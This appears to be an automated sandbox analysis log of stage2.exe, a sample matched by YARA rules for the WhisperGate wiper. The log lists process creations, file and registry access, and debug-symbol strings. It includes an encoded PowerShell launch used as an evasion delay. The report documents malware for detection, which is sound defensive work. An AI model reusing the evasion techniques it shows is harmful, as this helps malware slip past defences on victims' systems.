    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: Process Memory Space: powershell.exe PID: 7160, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: Process Memory Space: powershell.exe PID: 7140, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04A6CB102_2_04A6CB10
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E757682_2_07E75768
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E767282_2_07E76728
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E783202_2_07E78320
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E783102_2_07E78310
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E790582_2_07E79058
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E71B882_2_07E71B88
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E783202_2_07E78320
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E798202_2_07E79820
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07EA7E002_2_07EA7E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07EA7E002_2_07EA7E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E71B782_2_07E71B78
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3DFA813_2_07A3DFA8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3F27813_2_07A3F278
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F013_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3004013_2_07A30040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F013_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3EF2013_2_07A3EF20
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F013_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F013_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F013_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3004013_2_07A30040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A67E0013_2_07A67E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A67E0013_2_07A67E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080D8C2813_2_080D8C28
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080D8C1813_2_080D8C18
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080DA6B813_2_080DA6B8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080DA6B213_2_080DA6B2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3A16F13_2_07A3A16F
    Source: stage2.exe, 00000001.00000000.439903603.0000000000EA8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exe, 00000001.00000002.480852082.000000000161A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exe, 00000001.00000000.438479767.000000000161A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exeBinary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: stage2.exeStatic PE information: invalid certificate
    Source: stage2.exeVirustotal: Detection: 44%
    Source: stage2.exeReversingLabs: Detection: 48%
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Users\user\Desktop\stage2.exeJump to behavior
    Source: stage2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\stage2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\stage2.exe "C:\Users\user\Desktop\stage2.exe"
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==Jump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==Jump to behavior
    Source: C:\Users\user\Desktop\stage2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220117Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1Jump to behavior
    Source: classification engineClassification label: mal72.troj.evad.winEXE@8/14@1/2
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7084
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\stage2.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: stage2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: stage2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.446729518.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.446463538.0000000000D7F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448927179.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448308862.0000000004D01000.00000004.00000001.sdmp
    Source: Binary string: ncryptsslp.pdb sd$ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.pdbk source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdbJ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: clr.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdbz source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: schannel.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbQ2 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: mscorlib.pdb<7 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: i.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb8Std source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb+: source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.pdb source: stage2.exe, 00000001.00000002.481938339.0000000006684000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: secur32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdbRSDSD source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: (P}k0C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
